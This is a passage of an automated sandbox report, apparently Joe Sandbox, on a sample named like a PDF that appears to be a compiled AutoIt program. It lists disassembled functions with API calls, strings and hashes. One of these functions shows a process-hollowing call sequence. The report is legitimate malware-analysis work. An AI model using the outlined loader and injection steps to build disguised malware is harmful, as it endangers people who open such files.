                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 9ee6cd732228ebece568969d53c405f391d2b393e53e5160728d1c826d7f12bb
                                                            • Instruction ID: 7b69fa887c1881f5475c37bd61b80fef2538da1351c2c991768b2b7aa8858862
                                                            • Opcode Fuzzy Hash: 9ee6cd732228ebece568969d53c405f391d2b393e53e5160728d1c826d7f12bb
                                                            • Instruction Fuzzy Hash: 29F0FE716412907EFA311B27AC4DE7B3E7DD7D6F50F00426EB904A2670C7B91891DAB0
                                                            Function 036E23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1074 36e23b0-36e24be call 36e0000 call 36e22a0 CreateFileW 1081 36e24c5-36e24d5 1074->1081 1082 36e24c0 1074->1082 1085 36e24dc-36e24f6 VirtualAlloc 1081->1085 1086 36e24d7 1081->1086 1083 36e2575-36e257a 1082->1083 1087 36e24fa-36e2511 ReadFile 1085->1087 1088 36e24f8 1085->1088 1086->1083 1089 36e2515-36e254f call 36e22e0 call 36e12a0 1087->1089 1090 36e2513 1087->1090 1088->1083 1095 36e256b-36e2573 ExitProcess 1089->1095 1096 36e2551-36e2566 call 36e2330 1089->1096 1090->1083 1095->1083 1096->1095
                                                            APIs
                                                              • Part of subcall function 036E22A0: Sleep.KERNELBASE(000001F4), ref: 036E22B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036E24B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: YL0N65PV2I9
                                                            • API String ID: 2694422964-4008997143
                                                            • Opcode ID: 6dad13f3711b37bb72b0fc460e06b9208511894847a751ab14afd44f8cc928b8
                                                            • Instruction ID: 7adead62a11bd62467228bd064305190ae86b87a1be6fc6dc5986726fe9b1b27
                                                            • Opcode Fuzzy Hash: 6dad13f3711b37bb72b0fc460e06b9208511894847a751ab14afd44f8cc928b8
                                                            • Instruction Fuzzy Hash: 9F518331D15249EBEB10EBE4C919BEFBB79AF48300F004599E608BB2C0D7751B49CBA5
                                                            Function 0011564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1098 11564d-115666 1099 115683 1098->1099 1100 115668-11566d 1098->1100 1102 115685-11568b 1099->1102 1100->1099 1101 11566f-115671 1100->1101 1103 115673-115678 call 118d68 1101->1103 1104 11568c-115691 1101->1104 1114 11567e call 118ff6 1103->1114 1106 115693-11569d 1104->1106 1107 11569f-1156a3 1104->1107 1106->1107 1109 1156c3-1156d2 1106->1109 1110 1156b3-1156b5 1107->1110 1111 1156a5-1156b0 call 113020 1107->1111 1112 1156d4-1156d7 1109->1112 1113 1156d9 1109->1113 1110->1103 1116 1156b7-1156c1 1110->1116 1111->1110 1117 1156de-1156e3 1112->1117 1113->1117 1114->1099 1116->1103 1116->1109 1120 1156e9-1156f0 1117->1120 1121 1157cc-1157cf 1117->1121 1122 115731-115733 1120->1122 1123 1156f2-1156fa 1120->1123 1121->1102 1125 115735-115737 1122->1125 1126 11579d-11579e call 120df7 1122->1126 1123->1122 1124 1156fc 1123->1124 1127 115702-115704 1124->1127 1128 1157fa 1124->1128 1129 115739-115741 1125->1129 1130 11575b-115766 1125->1130 1134 1157a3-1157a7 1126->1134 1137 115706-115708 1127->1137 1138 11570b-115710 1127->1138 1139 1157fe-115807 1128->1139 1132 115751-115755 1129->1132 1133 115743-11574f 1129->1133 1135 115768 1130->1135 1136 11576a-11576d 1130->1136 1140 115757-115759 1132->1140 1133->1140 1134->1139 1141 1157a9-1157ae 1134->1141 1135->1136 1142 1157d4-1157d8 1136->1142 1143 11576f-11577b call 114916 call 1210ab 1136->1143 1137->1138 1138->1142 1144 115716-11572f call 120f18 1138->1144 1139->1102 1140->1136 1141->1142 1145 1157b0-1157c1 1141->1145 1146 1157ea-1157f5 call 118d68 1142->1146 1147 1157da-1157e7 call 113020 1142->1147 1159 115780-115785 1143->1159 1158 115792-11579b 1144->1158 1150 1157c4-1157c6 1145->1150 1146->1114 1147->1146 1150->1120 1150->1121 1158->1150 1160 11578b-11578e 1159->1160 1161 11580c-115810 1159->1161 1160->1128 1162 115790 1160->1162 1161->1139 1162->1158
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction ID: 33e347252693417f9b0a24722e5025c401b3b57e8fa02e498a25039bc6a60180
                                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction Fuzzy Hash: 67518270A00B05DBDB2C9EA9C8856EE77A3AF90320F648739F835962D0D7709D90CB90
                                                            Function 000F69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1163 f69ca-f69f1 call f4f3d 1166 12e45a-12e46a call 1597e5 1163->1166 1167 f69f7-f6a05 call f4f3d 1163->1167 1170 12e46f-12e471 1166->1170 1167->1166 1172 f6a0b-f6a11 1167->1172 1173 12e473-12e476 call f4faa 1170->1173 1174 12e490-12e4d8 call 110ff6 1170->1174 1175 f6a17-f6a39 call f6bec 1172->1175 1176 12e47b-12e48a call 154534 1172->1176 1173->1176 1182 12e4da-12e4e4 1174->1182 1183 12e4fd 1174->1183 1176->1174 1186 12e4f8-12e4f9 1182->1186 1187 12e4ff-12e512 1183->1187 1188 12e4e6-12e4f5 1186->1188 1189 12e4fb 1186->1189 1190 12e518 1187->1190 1191 12e689-12e68c call 112f95 1187->1191 1188->1186 1189->1187 1193 12e51f-12e522 call f75e0 1190->1193 1194 12e691-12e69a call f4faa 1191->1194 1197 12e527-12e549 call f5f12 call 15768b 1193->1197 1200 12e69c-12e6ac call f7776 call f5efb 1194->1200 1207 12e54b-12e558 1197->1207 1208 12e55d-12e567 call 157675 1197->1208 1216 12e6b1-12e6e1 call 14fcb1 call 11106c call 112f95 call f4faa 1200->1216 1211 12e650-12e660 call f766f 1207->1211 1214 12e581-12e58b call 15765f 1208->1214 1215 12e569-12e57c 1208->1215 1211->1197 1220 12e666-12e670 call f74bd 1211->1220 1225 12e59f-12e5a9 call f5f8a 1214->1225 1226 12e58d-12e59a 1214->1226 1215->1211 1216->1200 1224 12e675-12e683 1220->1224 1224->1191 1224->1193 1225->1211 1233 12e5af-12e5c7 call 14fc4d 1225->1233 1226->1211 1238 12e5ea-12e5ed 1233->1238 1239 12e5c9-12e5e8 call f7f41 call f5a64 1233->1239 1240 12e61b-12e61e 1238->1240 1241 12e5ef-12e60a call f7f41 call f6999 call f5a64 1238->1241 1262 12e60b-12e619 call f5f12 1239->1262 1243 12e620-12e629 call 14fb6e 1240->1243 1244 12e63e-12e641 call 157621 1240->1244 1241->1262 1243->1216 1255 12e62f-12e639 call 11106c 1243->1255 1252 12e646-12e64f call 11106c 1244->1252 1252->1211 1255->1197 1262->1252
                                                            APIs
                                                              • Part of subcall function 000F4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4F6F
                                                            • _free.LIBCMT ref: 0012E68C
                                                            • _free.LIBCMT ref: 0012E6D3
                                                              • Part of subcall function 000F6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000F6D0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: a285622e0b5ded24b4e046f716672249896f1b42190c7a74a3ef3e3aed2330f3
                                                            • Instruction ID: 300b3c24175230aff99d9d0601aa814eeb1330d575f2134e969988e0eabd839c
                                                            • Opcode Fuzzy Hash: a285622e0b5ded24b4e046f716672249896f1b42190c7a74a3ef3e3aed2330f3
                                                            • Instruction Fuzzy Hash: 3B919071910229EFCF08EFA4DC919EEB7B4FF19310F14446AF915AB292EB309915DB60
                                                            Function 000FF8CF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001103D3
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001103DB
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001103E6
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001103F1
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001103F9
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00110401
                                                              • Part of subcall function 00106259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000FFA90), ref: 001062B4
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000FFB2D
                                                            • OleInitialize.OLE32(00000000), ref: 000FFBAA
                                                            • CloseHandle.KERNEL32(00000000), ref: 001349F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: 0
                                                            • API String ID: 1986988660-3684773922
                                                            • Opcode ID: 9372992b732bd1d418349d0b710217b54dedad74a27b30dac4adf15ab790440f
                                                            • Instruction ID: 4767658eed702040b104abafd83c7e3a3d948ff6a7fb687d8aa4b40dbcb2fb6a
                                                            • Opcode Fuzzy Hash: 9372992b732bd1d418349d0b710217b54dedad74a27b30dac4adf15ab790440f
                                                            • Instruction Fuzzy Hash: C981BAB1904A408EC394EF2AEE556A67BF4FB78308710863ED018D7A72EB7D4485CF51
                                                            Function 000F35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000F35A1,SwapMouseButtons,00000004,?), ref: 000F35D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000F35A1,SwapMouseButtons,00000004,?,?,?,?,000F2754), ref: 000F35F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,000F35A1,SwapMouseButtons,00000004,?,?,?,?,000F2754), ref: 000F3617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: d6364716fe0dd43820d1355d199de1513d0f41ceff7aacd9d25d5715cdef9faf
                                                            • Instruction ID: 459e25c82100d46f473d619df184f5ece386fa73e63f4ab2949d9c115f42aeb6
                                                            • Opcode Fuzzy Hash: d6364716fe0dd43820d1355d199de1513d0f41ceff7aacd9d25d5715cdef9faf
                                                            • Instruction Fuzzy Hash: DD11457561020CBFDF208F64DC84ABFBBB9EF04750F008469F909D7210E2719E81ABA0
                                                            Function 036E12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 036E1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036E1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036E1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                            • Instruction ID: b38241c0d54a4b5d5b60fa8239eff89e8cdb981007a1234b63423f5d74b09994
                                                            • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                            • Instruction Fuzzy Hash: 5F622B30A15218DBEB24CFA4C850BDEB376EF58700F1091A9D10DEB390E77A9E85CB59
                                                            Function 001597E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F5045: _fseek.LIBCMT ref: 000F505D
                                                              • Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AAE
                                                              • Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AC1
                                                            • _free.LIBCMT ref: 0015992C
                                                            • _free.LIBCMT ref: 00159933
                                                            • _free.LIBCMT ref: 0015999E
                                                              • Part of subcall function 00112F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00119C64), ref: 00112FA9
                                                              • Part of subcall function 00112F95: GetLastError.KERNEL32(00000000,?,00119C64), ref: 00112FBB
                                                            • _free.LIBCMT ref: 001599A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction ID: 1239498643cd1294a10b4e9fd9b217f341b924fda2c32fa2722f4b082c24be6e
                                                            • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction Fuzzy Hash: 7F516FB1904218EFDF249F64DC45AEEBBB9EF48300F0004AEF619A7242DB715A94CF59
                                                            Function 0011493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction ID: 46e5136d76b5c2e746c91049621897395e2bc67085b573e6b243a8ccba87832c
                                                            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction Fuzzy Hash: DB41D575A0070A9BDF2CCEA9D8809EF77A6EF84B64B25813DE856C7640E7719DC08B44
                                                            Function 000F73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0012EE62
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0012EEAC
                                                              • Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE
                                                              • Part of subcall function 001109D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: 39d656f926614fde0406b7dfa0402005f7656e97f71081f8ab4ab5a093746ce3
                                                            • Instruction ID: 35d717bddf8f4f6fbca5e450e7c9e4d9fa874b99ddb7f8f97856bb062b5f0aab
                                                            • Opcode Fuzzy Hash: 39d656f926614fde0406b7dfa0402005f7656e97f71081f8ab4ab5a093746ce3
                                                            • Instruction Fuzzy Hash: C221A171A0025C9BCB11DF94D845BEE7BF9AF49300F00405AE508AB242DBB8598A9BA1
                                                            Function 0015901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: 6494c8707094921fae0e527d91b04c183791a249fc9f712b9c292d1b956f346c
                                                            • Instruction ID: d9c2de71d0974e00c262d8cd58291e70182cf0400fca41c39fe051af4c16b335
                                                            • Opcode Fuzzy Hash: 6494c8707094921fae0e527d91b04c183791a249fc9f712b9c292d1b956f346c
                                                            • Instruction Fuzzy Hash: C801F971C04218BEDB28C6A8C856EEEBBFCDB15301F00459AF552D6181E675A608C760
                                                            Function 00159B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00159B82
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00159B99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 0fa39ece6fd69cdceef5795b7287eda2e301e376367669e9c782694eed6bcdd4
                                                            • Instruction ID: 53c161c2b453f8c1ca5af4a3bd5fa9e4736282025b02a6929dbbfd3ebbcef934
                                                            • Opcode Fuzzy Hash: 0fa39ece6fd69cdceef5795b7287eda2e301e376367669e9c782694eed6bcdd4
                                                            • Instruction Fuzzy Hash: 26D05E7954030DABDB109B90DC0EFAB773CEB04700F0042A1BE58920A2EEB099D98B91
                                                            Function 0016CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d47fd2037e050fe626cc134584c8a0b33d566af93e4d9009c14da603171ac311
                                                            • Instruction ID: 33c2167a388d4f44bba20b8aff9f92192e5aac880735452d4a81c7059cf22ea8
                                                            • Opcode Fuzzy Hash: d47fd2037e050fe626cc134584c8a0b33d566af93e4d9009c14da603171ac311
                                                            • Instruction Fuzzy Hash: C8F15A71A083059FC714DF28C880A6ABBE5FF88314F54892EF8999B352D771E955CF82
                                                            Function 0011594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00115963
                                                              • Part of subcall function 0011A3AB: __NMSG_WRITE.LIBCMT ref: 0011A3D2
                                                              • Part of subcall function 0011A3AB: __NMSG_WRITE.LIBCMT ref: 0011A3DC
                                                            • __NMSG_WRITE.LIBCMT ref: 0011596A
                                                              • Part of subcall function 0011A408: GetModuleFileNameW.KERNEL32(00000000,001B43BA,00000104,?,00000001,00000000), ref: 0011A49A
                                                              • Part of subcall function 0011A408: ___crtMessageBoxW.LIBCMT ref: 0011A548
                                                              • Part of subcall function 001132DF: ___crtCorExitProcess.LIBCMT ref: 001132E5
                                                              • Part of subcall function 001132DF: ExitProcess.KERNEL32 ref: 001132EE
                                                              • Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68
                                                            • RtlAllocateHeap.NTDLL(00E80000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 4794c0efe9da38a2aaaddfda4aa6eed4ccf52016944bce37866743fad613c87a
                                                            • Instruction ID: ee8e964ae8d2845e6aeaa6713369edc522bf30c8a2e455c736d59d3e49d3504c
                                                            • Opcode Fuzzy Hash: 4794c0efe9da38a2aaaddfda4aa6eed4ccf52016944bce37866743fad613c87a
